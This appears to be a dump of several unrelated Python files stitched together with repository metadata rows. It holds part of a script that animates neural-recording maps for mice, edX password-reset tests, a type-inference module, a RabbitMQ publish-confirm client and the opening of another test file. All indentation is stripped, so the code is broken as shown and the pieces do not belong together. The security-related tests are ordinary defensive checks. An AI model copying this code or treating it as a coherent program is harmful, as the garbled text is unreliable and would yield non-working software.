mod_theta = mod_theta/(count_total+1.0)
rXX[m] = rX
maps[m] = { 'total': np.flip(count_total,1),
'x' : np.arange(0.0, 8*0.2, 0.2),
'y' : depth.loc[sessions].values.flatten()
}
headdir[m] = np.flip(hd_neurons, 1)
theta_dens[m] = np.flip(mod_theta, 1)
for m in movies.keys():
datatosave = { 'movies':movies[m],
'total':maps[m]['total'],
'x':maps[m]['x'],
'y':maps[m]['y'],
'headdir':headdir[m],
'jpc':rXX[m],
'theta_dens':theta_dens[m]
}
cPickle.dump(datatosave, open("../data/maps/"+m+".pickle", 'wb'))
sys.exit()
m = 'Mouse12'
space = 0.01
thl_lines = np.load("../figures/thalamus_lines.mat.npy").sum(2)
xlines, ylines, thl_lines = interpolate(thl_lines, np.linspace(maps[m]['x'].min(), maps[m]['x'].max(), thl_lines.shape[1]),
np.linspace(maps[m]['y'].min(), maps[m]['y'].max(), thl_lines.shape[0]), 0.001)
thl_lines -= thl_lines.min()
thl_lines /= thl_lines.max()
thl_lines[thl_lines>0.6] = 1.0
thl_lines[thl_lines<=0.6] = 0.0
xnew, ynew, total = interpolate(maps[m]['total'].copy(), maps[m]['x'], maps[m]['y'], space)
# total -= total.min()
# total /= total.max()
total = softmax(total, 20.0, 0.2)
for k in movies[m].keys():
movies[m][k] = filter_(movies[m][k], (2,2,5))
filmov = dict.fromkeys(movies[m].keys())
for k in filmov:
tmp = []
for t in range(movies[m][k].shape[-1]):
# frame = movies[m][k][:,:,t] / (maps[m]['total']+1.0)
frame = movies[m][k][:,:,t]
xnew, ynew, frame = interpolate(frame, maps[m]['x'], maps[m]['y'], space)
tmp.append(frame)
tmp = np.array(tmp)
filmov[k] = filter_(tmp, 5)
filmov[k] = filmov[k] - np.min(filmov[k])
filmov[k] = filmov[k] / np.max(filmov[k] + 1e-8)
filmov[k] = softmax(filmov[k], 10, 0.5)
xnew, ynew, head = interpolate(headdir[m].copy(), maps[m]['x'], maps[m]['y'], space)
head[head < np.percentile(head, 90)] = 0.0
# sys.exit()
# figure()
# index = np.arange(0,20,1)+90
# for i in range(len(index)):
# subplot(4,5,i+1)
# # imshow(get_rgb(filmov['swr'][index[i]].copy(), total.copy(), np.ones_like(total), 0.83),
# imshow(filmov['swr'][index[i]].copy(),
# aspect = 'auto',
# origin = 'upper',
# cmap = 'jet', vmin = 0.0, vmax = 1.0)
# # extent = (xnew[0], xnew[-1], ynew[-1], ynew[0]))
# title("t = "+str(times[index[i]])+" ms")
# # contour(head, aspect = 'equal',origin = 'upper', extent = (xnew[0], xnew[-1], ynew[-1], ynew[0]))
# # contour(thl_lines, aspect = 'equal', origin = 'upper', extent = (xlines[0], xlines[-1], ylines[-1], ylines[0]), colors = 'white')
# # show(thl_lines, aspect = 'equal', origin = 'upper', extent = (xlines[0], xlines[-1], ylines[-1], ylines[0]))
# show()
from matplotlib import animation, rc
from IPython.display import HTML, Image
rc('animation', html='html5')
fig, axes = plt.subplots(1,1)
images = [axes.imshow(get_rgb(filmov['swr'][0].copy(), np.ones_like(total), total, 0.65), vmin = 0.0, vmax = 1.0, aspect = 'equal', origin = 'upper', extent = (xnew[0], xnew[-1], ynew[-1], ynew[0]))]
# images = [axes.imshow(filmov['swr'][0], aspect = 'equal', origin = 'upper', cmap = 'jet', vmin = 0.0, vmax = 1.0, extent = (xnew[0], xnew[-1], ynew[-1], ynew[0]))]
axes.contour(head, aspect = 'equal',origin = 'upper', extent = (xnew[0], xnew[-1], ynew[-1], ynew[0]), cmap = 'gist_gray')
axes.contour(thl_lines, aspect = 'equal', origin = 'upper', extent = (xlines[0], xlines[-1], ylines[-1], ylines[0]), colors = 'white')
def init():
images[0].set_data(get_rgb(filmov['swr'][0].copy(), np.ones_like(total), total, 0.65))
# images[0].set_data(filmov['swr'][0])
return images
def animate(t):
images[0].set_data(get_rgb(filmov['swr'][t].copy(), np.ones_like(total), total, 0.65))
# images[0].set_data(filmov['swr'][t])
return images
anim = animation.FuncAnimation(fig, animate, init_func=init,
frames=range(len(times)), interval=0, blit=False, repeat_delay = 5000)
anim.save('../figures/swr_mod_'+m+'.gif', writer='imagemagick', fps=60)
show()
sys.exit()
sys.exit()
from matplotlib import animation, rc
from IPython.display import HTML, Image
rc('animation', html='html5')
fig, axes = plt.subplots(1,3)
images = []
for k, i in zip(['swr', 'theta', 'spindle'], range(3)):
images.append(axes[i].imshow(filmov[k][0], aspect = 'auto', cmap = 'jet', origin = 'upper', extent = (xnew[0], xnew[-1], ynew[-1], ynew[0])))
contour(head, aspect = 'equal',origin = 'upper', extent = (xnew[0], xnew[-1], ynew[-1], ynew[0]))
def init():
for i in range(3): images[i].set_data(filmov[k][0])
contour(head, aspect = 'equal',origin = 'upper', extent = (xnew[0], xnew[-1], ynew[-1], ynew[0]))
return images
def animate(t):
for i in range(3): images[i].set_data(filmov[k][t])
contour(head, aspect = 'equal',origin = 'upper', extent = (xnew[0], xnew[-1], ynew[-1], ynew[0]))
return images
anim = animation.FuncAnimation(fig, animate, init_func=init,
frames=range(len(times)), interval=0, blit=True, repeat_delay = 0)
sys.exit()
m = 'Mouse12'
images = []
# for i in range(len(mouses)):
# lines1.append(axes[0,i].plot([],[],'o-')[0])
# lines2.append(axes[0,i].plot([],[],'o-')[0])
# axes[0,i].set_xlim(-500, 500)
# axes[0,i].set_ylim(rXX[mouses[i]].min(), rXX[mouses[i]].max())
images.append(axes.imshow(movies[m]['spindle'][:,:,0], aspect = 'auto', cmap = 'jet'))
def init():
# for i, m in zip(range(len(mouses)), mouses):
# images[i].set_data(movies[m][0])
# lines1[i].set_data(times[0], rXX[m][0,0])
# lines2[i].set_data(times[0], rXX[m][0,1])
# return images+lines1+lines2
images[0].set_data(movies[m]['spindle'][:,:,0])
return images
def animate(t):
# for i, m in zip(range(len(mouses)), mouses):
# images[i].set_data(movies[m][t])
# lines1[i].set_data(times[0:t], rXX[m][0:t,0])
# lines2[i].set_data(times[0:t], rXX[m][0:t,1])
images[0].set_data(movies[m]['spindle'][:,:,t])
return images
anim = animation.FuncAnimation(fig, animate, init_func=init,
frames=movies[m]['spindle'].shape[-1], interval=0, blit=True, repeat_delay = 1)
show()
# anim.save('../figures/animation_swr_mod_jpca.gif', writer='imagemagick', fps=60)
|
gpl-3.0
| -2,535,166,758,625,621,500 | 36.989362 | 199 | 0.556007 | false |
pepeportela/edx-platform
|
common/djangoapps/student/tests/test_reset_password.py
|
1
|
15742
|
"""
Test the various password reset flows
"""
import json
import re
import unittest
import ddt
from django.conf import settings
from django.contrib.auth.hashers import UNUSABLE_PASSWORD_PREFIX
from django.contrib.auth.models import User
from django.contrib.auth.tokens import default_token_generator
from django.core.cache import cache
from django.core.urlresolvers import reverse
from django.test.client import RequestFactory
from django.test.utils import override_settings
from django.utils.http import int_to_base36
from edx_oauth2_provider.tests.factories import AccessTokenFactory, ClientFactory, RefreshTokenFactory
from mock import Mock, patch
from oauth2_provider import models as dot_models
from provider.oauth2 import models as dop_models
from openedx.core.djangoapps.oauth_dispatch.tests import factories as dot_factories
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from openedx.core.djangolib.testing.utils import CacheIsolationTestCase
from student.tests.factories import UserFactory
from student.tests.test_email import mock_render_to_string
from student.views import SETTING_CHANGE_INITIATED, password_reset, password_reset_confirm_wrapper
from util.testing import EventTestMixin
from .test_configuration_overrides import fake_get_value
@unittest.skipUnless(
settings.ROOT_URLCONF == "lms.urls",
"reset password tests should only run in LMS"
)
@ddt.ddt
class ResetPasswordTests(EventTestMixin, CacheIsolationTestCase):
""" Tests that clicking reset password sends email, and doesn't activate the user
"""
request_factory = RequestFactory()
ENABLED_CACHES = ['default']
def setUp(self):
super(ResetPasswordTests, self).setUp('student.views.tracker')
self.user = UserFactory.create()
self.user.is_active = False
self.user.save()
self.token = default_token_generator.make_token(self.user)
self.uidb36 = int_to_base36(self.user.id)
self.user_bad_passwd = UserFactory.create()
self.user_bad_passwd.is_active = False
self.user_bad_passwd.password = UNUSABLE_PASSWORD_PREFIX
self.user_bad_passwd.save()
@patch('student.views.render_to_string', Mock(side_effect=mock_render_to_string, autospec=True))
def test_user_bad_password_reset(self):
"""Tests password reset behavior for user with password marked UNUSABLE_PASSWORD_PREFIX"""
bad_pwd_req = self.request_factory.post('/password_reset/', {'email': self.user_bad_passwd.email})
bad_pwd_resp = password_reset(bad_pwd_req)
# If they've got an unusable password, we return a successful response code
self.assertEquals(bad_pwd_resp.status_code, 200)
obj = json.loads(bad_pwd_resp.content)
self.assertEquals(obj, {
'success': True,
'value': "('registration/password_reset_done.html', [])",
})
self.assert_no_events_were_emitted()
@patch('student.views.render_to_string', Mock(side_effect=mock_render_to_string, autospec=True))
def test_nonexist_email_password_reset(self):
"""Now test the exception cases with of reset_password called with invalid email."""
bad_email_req = self.request_factory.post('/password_reset/', {'email': self.user.email + "makeItFail"})
bad_email_resp = password_reset(bad_email_req)
# Note: even if the email is bad, we return a successful response code
        # This prevents someone from trying to "brute-force" their way into finding
        # out which emails are and aren't registered with edX
self.assertEquals(bad_email_resp.status_code, 200)
obj = json.loads(bad_email_resp.content)
self.assertEquals(obj, {
'success': True,
'value': "('registration/password_reset_done.html', [])",
})
self.assert_no_events_were_emitted()
@patch('student.views.render_to_string', Mock(side_effect=mock_render_to_string, autospec=True))
def test_password_reset_ratelimited(self):
""" Try (and fail) resetting password 30 times in a row on an non-existant email address """
cache.clear()
for i in xrange(30):
good_req = self.request_factory.post('/password_reset/', {
'email': 'thisdoesnotexist{0}@foo.com'.format(i)
})
good_resp = password_reset(good_req)
self.assertEquals(good_resp.status_code, 200)
# then the rate limiter should kick in and give a HttpForbidden response
bad_req = self.request_factory.post('/password_reset/', {'email': 'thisdoesnotexist@foo.com'})
bad_resp = password_reset(bad_req)
self.assertEquals(bad_resp.status_code, 403)
self.assert_no_events_were_emitted()
cache.clear()
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', "Test only valid in LMS")
@patch('django.core.mail.send_mail')
@patch('student.views.render_to_string', Mock(side_effect=mock_render_to_string, autospec=True))
def test_reset_password_email(self, send_email):
"""Tests contents of reset password email, and that user is not active"""
good_req = self.request_factory.post('/password_reset/', {'email': self.user.email})
good_req.user = self.user
dop_client = ClientFactory()
dop_access_token = AccessTokenFactory(user=self.user, client=dop_client)
RefreshTokenFactory(user=self.user, client=dop_client, access_token=dop_access_token)
dot_application = dot_factories.ApplicationFactory(user=self.user)
dot_access_token = dot_factories.AccessTokenFactory(user=self.user, application=dot_application)
dot_factories.RefreshTokenFactory(user=self.user, application=dot_application, access_token=dot_access_token)
good_resp = password_reset(good_req)
self.assertEquals(good_resp.status_code, 200)
self.assertFalse(dop_models.AccessToken.objects.filter(user=self.user).exists())
self.assertFalse(dop_models.RefreshToken.objects.filter(user=self.user).exists())
self.assertFalse(dot_models.AccessToken.objects.filter(user=self.user).exists())
self.assertFalse(dot_models.RefreshToken.objects.filter(user=self.user).exists())
obj = json.loads(good_resp.content)
self.assertEquals(obj, {
'success': True,
'value': "('registration/password_reset_done.html', [])",
})
(subject, msg, from_addr, to_addrs) = send_email.call_args[0]
self.assertIn("Password reset", subject)
self.assertIn("You're receiving this e-mail because you requested a password reset", msg)
self.assertEquals(from_addr, configuration_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL))
self.assertEquals(len(to_addrs), 1)
self.assertIn(self.user.email, to_addrs)
self.assert_event_emitted(
SETTING_CHANGE_INITIATED, user_id=self.user.id, setting=u'password', old=None, new=None,
)
        # test that the user is not active
self.user = User.objects.get(pk=self.user.pk)
self.assertFalse(self.user.is_active)
re.search(r'password_reset_confirm/(?P<uidb36>[0-9A-Za-z]+)-(?P<token>.+)/', msg).groupdict()
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', "Test only valid in LMS")
@patch('django.core.mail.send_mail')
@ddt.data((False, 'http://'), (True, 'https://'))
@ddt.unpack
def test_reset_password_email_https(self, is_secure, protocol, send_email):
"""
Tests that the right url protocol is included in the reset password link
"""
req = self.request_factory.post(
'/password_reset/', {'email': self.user.email}
)
req.is_secure = Mock(return_value=is_secure)
req.user = self.user
password_reset(req)
_, msg, _, _ = send_email.call_args[0]
expected_msg = "Please go to the following page and choose a new password:\n\n" + protocol
self.assertIn(expected_msg, msg)
self.assert_event_emitted(
SETTING_CHANGE_INITIATED, user_id=self.user.id, setting=u'password', old=None, new=None
)
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', "Test only valid in LMS")
@patch('django.core.mail.send_mail')
@ddt.data(('Crazy Awesome Site', 'Crazy Awesome Site'), (None, 'edX'))
@ddt.unpack
def test_reset_password_email_domain(self, domain_override, platform_name, send_email):
"""
Tests that the right url domain and platform name is included in
the reset password email
"""
with patch("django.conf.settings.PLATFORM_NAME", platform_name):
req = self.request_factory.post(
'/password_reset/', {'email': self.user.email}
)
req.is_secure = Mock(return_value=True)
req.get_host = Mock(return_value=domain_override)
req.user = self.user
password_reset(req)
_, msg, _, _ = send_email.call_args[0]
reset_intro_msg = "you requested a password reset for your user account at {}".format(platform_name)
self.assertIn(reset_intro_msg, msg)
reset_link = "https://{}/"
if domain_override:
reset_link = reset_link.format(domain_override)
else:
reset_link = reset_link.format(settings.SITE_NAME)
self.assertIn(reset_link, msg)
sign_off = "The {} Team".format(platform_name)
self.assertIn(sign_off, msg)
self.assert_event_emitted(
SETTING_CHANGE_INITIATED, user_id=self.user.id, setting=u'password', old=None, new=None
)
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', "Test only valid in LMS")
@patch("openedx.core.djangoapps.site_configuration.helpers.get_value", fake_get_value)
@patch('django.core.mail.send_mail')
def test_reset_password_email_configuration_override(self, send_email):
"""
Tests that the right url domain and platform name is included in
the reset password email
"""
req = self.request_factory.post(
'/password_reset/', {'email': self.user.email}
)
req.get_host = Mock(return_value=None)
req.user = self.user
password_reset(req)
_, msg, from_addr, _ = send_email.call_args[0]
reset_msg = "you requested a password reset for your user account at {}".format(fake_get_value('platform_name'))
self.assertIn(reset_msg, msg)
self.assert_event_emitted(
SETTING_CHANGE_INITIATED, user_id=self.user.id, setting=u'password', old=None, new=None
)
self.assertEqual(from_addr, "no-reply@fakeuniversity.com")
@ddt.data(
('invalidUid', 'invalid_token'),
(None, 'invalid_token'),
('invalidUid', None),
)
@ddt.unpack
def test_reset_password_bad_token(self, uidb36, token):
"""Tests bad token and uidb36 in password reset"""
if uidb36 is None:
uidb36 = self.uidb36
if token is None:
token = self.token
bad_request = self.request_factory.get(
reverse(
"password_reset_confirm",
kwargs={"uidb36": uidb36, "token": token}
)
)
password_reset_confirm_wrapper(bad_request, uidb36, token)
self.user = User.objects.get(pk=self.user.pk)
self.assertFalse(self.user.is_active)
def test_reset_password_good_token(self):
"""Tests good token and uidb36 in password reset"""
url = reverse(
"password_reset_confirm",
kwargs={"uidb36": self.uidb36, "token": self.token}
)
good_reset_req = self.request_factory.get(url)
password_reset_confirm_wrapper(good_reset_req, self.uidb36, self.token)
self.user = User.objects.get(pk=self.user.pk)
self.assertTrue(self.user.is_active)
def test_password_reset_fail(self):
"""Tests that if we provide mismatched passwords, user is not marked as active."""
self.assertFalse(self.user.is_active)
url = reverse(
'password_reset_confirm',
kwargs={'uidb36': self.uidb36, 'token': self.token}
)
request_params = {'new_password1': 'password1', 'new_password2': 'password2'}
confirm_request = self.request_factory.post(url, data=request_params)
# Make a password reset request with mismatching passwords.
resp = password_reset_confirm_wrapper(confirm_request, self.uidb36, self.token)
# Verify the response status code is: 200 with password reset fail and also verify that
# the user is not marked as active.
self.assertEqual(resp.status_code, 200)
self.assertFalse(User.objects.get(pk=self.user.pk).is_active)
@override_settings(PASSWORD_MIN_LENGTH=2)
@override_settings(PASSWORD_MAX_LENGTH=10)
@ddt.data(
{
'password': '1',
'error_message': 'Password: Invalid Length (must be 2 characters or more)',
},
{
'password': '01234567891',
'error_message': 'Password: Invalid Length (must be 10 characters or fewer)'
}
)
def test_password_reset_with_invalid_length(self, password_dict):
"""Tests that if we provide password characters less then PASSWORD_MIN_LENGTH,
or more than PASSWORD_MAX_LENGTH, password reset will fail with error message.
"""
url = reverse(
'password_reset_confirm',
kwargs={'uidb36': self.uidb36, 'token': self.token}
)
request_params = {'new_password1': password_dict['password'], 'new_password2': password_dict['password']}
confirm_request = self.request_factory.post(url, data=request_params)
# Make a password reset request with minimum/maximum passwords characters.
response = password_reset_confirm_wrapper(confirm_request, self.uidb36, self.token)
self.assertEqual(response.context_data['err_msg'], password_dict['error_message'])
@patch('student.views.password_reset_confirm')
@patch("openedx.core.djangoapps.site_configuration.helpers.get_value", fake_get_value)
def test_reset_password_good_token_configuration_override(self, reset_confirm):
"""Tests password reset confirmation page for site configuration override."""
url = reverse(
"password_reset_confirm",
kwargs={"uidb36": self.uidb36, "token": self.token}
)
good_reset_req = self.request_factory.get(url)
password_reset_confirm_wrapper(good_reset_req, self.uidb36, self.token)
confirm_kwargs = reset_confirm.call_args[1]
self.assertEquals(confirm_kwargs['extra_context']['platform_name'], 'Fake University')
self.user = User.objects.get(pk=self.user.pk)
self.assertTrue(self.user.is_active)
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', "Test only valid in LMS")
@patch('django.core.mail.send_mail')
@ddt.data('Crazy Awesome Site', 'edX')
def test_reset_password_email_subject(self, platform_name, send_email):
"""
Tests that the right platform name is included in
the reset password email subject
"""
with patch("django.conf.settings.PLATFORM_NAME", platform_name):
req = self.request_factory.post(
'/password_reset/', {'email': self.user.email}
)
req.user = self.user
password_reset(req)
subj, _, _, _ = send_email.call_args[0]
self.assertIn(platform_name, subj)
|
agpl-3.0
| -2,669,021,319,108,499,000 | 43.849003 | 120 | 0.652395 | false |
PiJoules/python-type-inference
|
pytype.py
|
1
|
13687
|
class PyType:
NEW_METHOD = "__new__"
INIT_METHOD = "__init__"
DEL_METHOD = "__del__"
REPR_METHOD = "__repr__"
STR_METHOD = "__str__"
BYTES_METHOD = "__bytes__"
FORMAT_METHOD = "__format__"
LT_METHOD = "__lt__"
LE_METHOD = "__le__"
EQ_METHOD = "__eq__"
NE_METHOD = "__ne__"
GT_METHOD = "__gt__"
GE_METHOD = "__ge__"
HASH_METHOD = "__hash__"
BOOL_METHOD = "__bool__"
GETATTR_METHOD = "__getattr__"
GETATTRIBUTE_METHOD = "__getattribute__"
SETATTR_METHOD = "__setattr__"
DELATTR_METHOD = "__delattr__"
DIR_METHOD = "__dir__"
GETITEM_METHOD = "__getitem__"
CONTAINS_METHOD = "__contains__"
NEXT_METHOD = "__next__"
ITER_METHOD = "__iter__"
ADD_METHOD = "__add__"
SUB_METHOD = "__sub__"
MUL_METHOD = "__mul__"
TRUEDIV_METHOD = "__truediv__"
IADD_METHOD = "__iadd__"
def __init__(self, name, init_attrs=None, parents=None):
"""
Args:
name (str)
init_attrs (Optional[dict[str, set[PyType]]])
parents (Optional[list[PyType]])
"""
assert isinstance(name, str)
self.__name = name
self.__attrs = init_attrs or {} # dict[str, set[PyType]]
self.__parents = parents or []
def parents(self):
return self.__parents
def name(self):
"""
The name of this type. This is equivalent to the result
of obj.__class__.
"""
return self.__name
def attrs(self):
"""
Returns:
dict[str, set[PyType]]
"""
attrs = {}
for parent in self.parents():
for attr, types in parent.attrs().items():
if attr in attrs:
attrs[attr] |= types
else:
attrs[attr] = set(types)
for attr, types in self.__attrs.items():
if attr in attrs:
attrs[attr] |= types
else:
attrs[attr] = set(types)
return attrs
def has_attr(self, attr):
return attr in self.attrs()
def exclusive_has_attr(self, attr):
return attr in self.__attrs
def is_type(self, other):
"""
Args:
other (class_type.ClassType)
"""
if self.name() == other.name():
return True
for parent in self.parents():
if parent.is_type(other):
return True
return False
"""
Wrappers for magic methods that affect this pytype.
"""
def set_attr(self, attr, types):
assert isinstance(types, set)
assert all(isinstance(x, PyType) for x in types)
if self.exclusive_has_attr(attr):
self.__attrs[attr] |= types
else:
self.__attrs[attr] = set(types)
def get_attr(self, attr):
if self.has_attr(attr):
return self.attrs()[attr]
else:
from class_type import ClassType
if isinstance(self, ClassType):
raise KeyError("Attribute '{}' not in class '{}'".format(attr, self.defined_name()))
else:
raise KeyError("Attribute '{}' not in pytype '{}'".format(attr, self.name()))
def call_attr(self, attr, args):
"""
Call an attribute of this type. The result is the set of all results of
calling each type that an attribute can be.
Equivalent to: x.attr(args)
Returns:
set[PyType]
"""
types = set()
attrs = self.get_attr(attr)
for t in attrs:
types |= t.call(args)
return types
def _call_and_check_return(self, attr, expected, args):
"""
Call an attribute and check that it returns an expected type. This is
for methods like __hash__ or __str__ which must return specifically
strs and ints otherwise a TypeError is raised.
Args:
attr (str)
expected (PyType)
args (arguments.Arguments)
Returns:
set[PyType]
"""
if self.has_attr(attr):
results = self.call_attr(attr, args)
if results != {expected}:
raise TypeError("{} for type '{}' returned non-{} (type {})".format(attr, self.name(), expected.name(), results))
return {expected}
def _optional_call(self, attr, default, args):
"""
Call an attribute if it exists and return the results. Otherwise,
return the default.
Args:
attr (str)
default (PyType)
args (arguments.Arguments)
Returns:
set[PyType]
"""
if self.has_attr(attr):
return self.call_attr(attr, args)
else:
return {default}
"""
Implementations of magic methods
http://www.diveintopython3.net/special-method-names.html
    These methods are meant to be used internally by this package and do not
interact with the nodes returned by the python ast module. These methods
handle only internal pytypes and should not accept or return ast nodes.
"""
def call(self, args):
"""
        This emulates a variable being called in Python space. This is for
types that act like functions.
Equivalent to: x(args) or x.__call__(args)
Returns:
set[PyType]
"""
raise RuntimeError("pytype '{}' is not callable".format(self.name()))
def call_new(self, args):
"""
Called once when a class is defined.
"""
from builtin_types import NONE_TYPE
return self._optional_call(self.NEW_METHOD, NONE_TYPE, args)
def call_init(self, args):
"""
        Only call this method if it is defined. Otherwise it does nothing.
"""
from builtin_types import NONE_TYPE
return self._optional_call(self.INIT_METHOD, NONE_TYPE, args)
def call_del(self, args):
return self.call_attr(self.DEL_METHOD, args)
"""
These methods must return specific types. If they are custom implemented
and do not return their specific types, a TypeError is raised at runtime.
"""
def call_repr(self, args):
from str_type import STR_CLASS
return self._call_and_check_return(self.REPR_METHOD, STR_CLASS.instance(), args)
def call_str(self, args):
from str_type import STR_CLASS
return self._call_and_check_return(self.STR_METHOD, STR_CLASS.instance(), args)
def call_bytes(self, args):
from bytes_type import BYTES_CLASS
return self._call_and_check_return(self.BYTES_METHOD, BYTES_CLASS.instance(), args)
def call_format(self, args):
"""
This is what is called when performing a string format.
Example at https://pyformat.info/#custom_1
"""
from str_type import STR_CLASS
return self._call_and_check_return(self.FORMAT_METHOD, STR_CLASS.instance(), args)
"""
Rich comparison methods
Only __eq__ and __ne__ are implemented by default where __eq__ compares the
    hashes of both objects and __ne__ is the inverse of the result of __eq__.
"""
def call_lt(self, args):
return self.call_attr(self.LT_METHOD, args)
def call_le(self, args):
return self.call_attr(self.LE_METHOD, args)
def call_eq(self, args):
from builtin_types import BOOL_TYPE
return self._optional_call(self.EQ_METHOD, BOOL_TYPE, args)
def call_ne(self, args):
from builtin_types import BOOL_TYPE
return self._optional_call(self.NE_METHOD, BOOL_TYPE, args)
def call_gt(self, args):
return self.call_attr(self.GT_METHOD, args)
def call_ge(self, args):
return self.call_attr(self.GE_METHOD, args)
def call_hash(self, args):
from builtin_types import INT_TYPE
return self._call_and_check_return(self.HASH_METHOD, INT_TYPE, args)
def call_bool(self, args):
from builtin_types import BOOL_TYPE
return self._call_and_check_return(self.BOOL_METHOD, BOOL_TYPE, args)
"""
Attribute access
"""
def call_getattr(self, args):
"""
This method is a wrapper for calling x.__getattr__. Ideally, this
method will not actually be called explicitly by this package since
the get_attr() method will be called instead. This method will
really only be called when the __getattr__ method is explicitly called
by the python program.
"""
raise NotImplementedError("TODO: Implement logic for handling __getattr__")
def call_getattribute(self, args):
"""
        This method is the unconditional call for x.attr.
"""
raise NotImplementedError("TODO: Implement logic for handling __getattribute__")
def call_setattr(self, args):
raise NotImplementedError("TODO: Implement logic for handling __setattr__")
def call_delattr(self, args):
return self.call_attr(self.DELATTR_METHOD, args)
def call_dir(self, args):
from tuple_type import TUPLE_CLASS
return self._call_and_check_return(self.DIR_METHOD, TUPLE_CLASS.instance().new_container(), args)
"""
Emulating container types
"""
def call_getitem(self, args):
return self.call_attr(self.GETITEM_METHOD, args)
def call_contains(self, args):
return self.call_attr(self.CONTAINS_METHOD, args)
"""
Emulating numeric types
"""
def _alt_method(self, alt, method):
"""Get an alternated method."""
assert method.startswith("__")
assert method.endswith("__")
return "__" + alt + method[2:-2] + "__"
def _rmethod(self, method):
"""Get the reflected method."""
return self._alt_method("r", method)
def _imethod(self, method):
"""Get the augmented (inplace) method."""
return self._alt_method("i", method)
def _call_numeric_op(self, method, args, aug=False):
from arguments import Arguments
if aug:
i_meth = self._imethod(method)
return self.call_attr(i_meth, args)
if self.has_attr(method):
return self.call_attr(method, args)
else:
# Get the reflected magic method
r_meth = self._rmethod(method)
            # Get the right side types
pos_args = args.pos_args()
if len(pos_args) != 1:
raise RuntimeError("Expected 1 argument for numeric operation")
right_types = pos_args.pop()
results = set()
for t in right_types:
if t.has_attr(r_meth):
results |= t.call_attr(r_meth, Arguments([self]))
else:
raise RuntimeError("No support for {} or {} on types '{}' and '{}'".format(method, r_meth, self, t))
return results
def call_add(self, args, **kwargs):
return self._call_numeric_op(self.ADD_METHOD, args, **kwargs)
def call_sub(self, args, **kwargs):
return self._call_numeric_op(self.SUB_METHOD, args, **kwargs)
def call_mul(self, args, **kwargs):
return self._call_numeric_op(self.MUL_METHOD, args, **kwargs)
def call_truediv(self, args, **kwargs):
return self._call_numeric_op(self.TRUEDIV_METHOD, args, **kwargs)
"""
Iterator types
"""
def call_iter(self, args):
return self.call_attr(self.ITER_METHOD, args)
def call_next(self, args):
return self.call_attr(self.NEXT_METHOD, args)
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash(self.name())
def __eq__(self, other):
raise NotImplementedError("Must implement __eq__ for pytype '{}'".format(type(self)))
def __str__(self):
return self.name()
def load_builtin_constants():
from builtin_types import STR_TYPE
return {
"__name__": {STR_TYPE},
}
def load_builtin_vars():
from function_type import BuiltinFunction
from instance_type import InstanceType
from tuple_type import TUPLE_CLASS
from dict_type import DICT_CLASS
from builtin_types import (
INT_CLASS, FLOAT_CLASS, BOOL_CLASS, STR_CLASS, FILE_CLASS,
NONE_TYPE, INT_TYPE, FILE_TYPE, BOOL_TYPE, STR_TYPE
)
from value_error_type import VALUE_ERROR_CLASS
"""
Builtin functions
"""
class PrintFunction(BuiltinFunction):
def __init__(self):
super().__init__(
"print",
vararg="objects",
kwonlyargs=["sep", "end", "file", "flush"],
kwonly_defaults=[
{STR_TYPE},
{STR_TYPE},
{FILE_TYPE},
{BOOL_TYPE},
]
)
def call(self, args):
return {NONE_TYPE}
print_func = PrintFunction()
class InputFunction(BuiltinFunction):
def __init__(self):
super().__init__(
"input",
keywords=["prompt"],
keyword_defaults=[{STR_TYPE}],
)
def call(self, args):
return {STR_TYPE}
input_func = InputFunction()
builtins = {
"int": {INT_CLASS},
"float": {FLOAT_CLASS},
"bool": {BOOL_CLASS},
"str": {STR_CLASS},
"tuple": {TUPLE_CLASS},
"dict": {DICT_CLASS},
"print": {print_func},
"input": {input_func},
"ValueError": {VALUE_ERROR_CLASS},
}
    builtins.update(load_builtin_constants())
return builtins
|
mit
| -4,542,938,915,994,257,400 | 28.245726 | 129 | 0.560532 | false |
lipixun/pytest
|
rabbitmq/publishconfirm/client.py
|
1
|
2881
|
#!/usr/bin/env python
# encoding=utf8
# The publish confirm test client
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import gevent
from gevent import monkey
monkey.patch_all()
from haigha.connections.rabbit_connection import RabbitConnection
from haigha.message import Message
class Client(object):
"""The RPC Client
"""
def __init__(self, host, port, vhost, user, password):
"""Create a new Server
"""
self._conn = RabbitConnection(transport = 'gevent', host = host, port = port, vhost = vhost, user = user, password = password)
gevent.spawn(self.loop)
self._channel = self._conn.channel()
self._channel.confirm.select()
self._channel.basic.set_return_listener(self.onBasicReturn)
self._channel.basic.set_ack_listener(self.onDeliverAck)
self._channel.basic.set_nack_listener(self.onDeliverNAck)
def loop(self):
"""The loop
"""
while self._conn:
self._conn.read_frames()
gevent.sleep()
def onBasicReturn(self, message):
"""On basic return
"""
print 'Basic return message [%s]' % message
def onDeliverAck(self, messageID):
"""On deliver ACK
"""
print 'Deliver ACK [%s]' % messageID
def onDeliverNAck(self, messageID, requeue):
"""On deliver nack
"""
print 'Deliver NACK [%s] Requeue [%s]' % (messageID, requeue)
def call(self, content, queue):
"""The call method
"""
return self._channel.basic.publish(Message(content), '', queue)
if __name__ == '__main__':
from argparse import ArgumentParser
def getArguments():
"""Get arguments
"""
parser = ArgumentParser(description = 'Confirm test client')
parser.add_argument('--host', dest = 'host', required = True, help = 'The host')
parser.add_argument('--port', dest = 'port', default = 5672, type = int, help = 'The port')
parser.add_argument('--vhost', dest = 'vhost', default = '/test', help = 'The virtual host')
parser.add_argument('--user', dest = 'user', default = 'test', help = 'The user name')
parser.add_argument('--password', dest = 'password', default = 'test', help = 'The password')
# Done
return parser.parse_args()
def main():
"""The main entry
"""
args = getArguments()
# Create the server
client = Client(args.host, args.port, args.vhost, args.user, args.password)
# Send the messages
msgID = client.call('A good message', 'test_confirm')
print 'Sent good message [%s]' % msgID
msgID = client.call('A bad message', 'a_none_existed_queue')
print 'Sent bad message [%s]' % msgID
print 'Wait for deliver ack / nack'
# Done
gevent.sleep(1000)
main()
|
gpl-2.0
| 3,695,272,715,719,721,500 | 31.370787 | 134 | 0.597015 | false |
hyakuhei/cleantox
|
hacking/tests/test_doctest.py
|
1
|
3232
|
#!/usr/bin/env python
# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
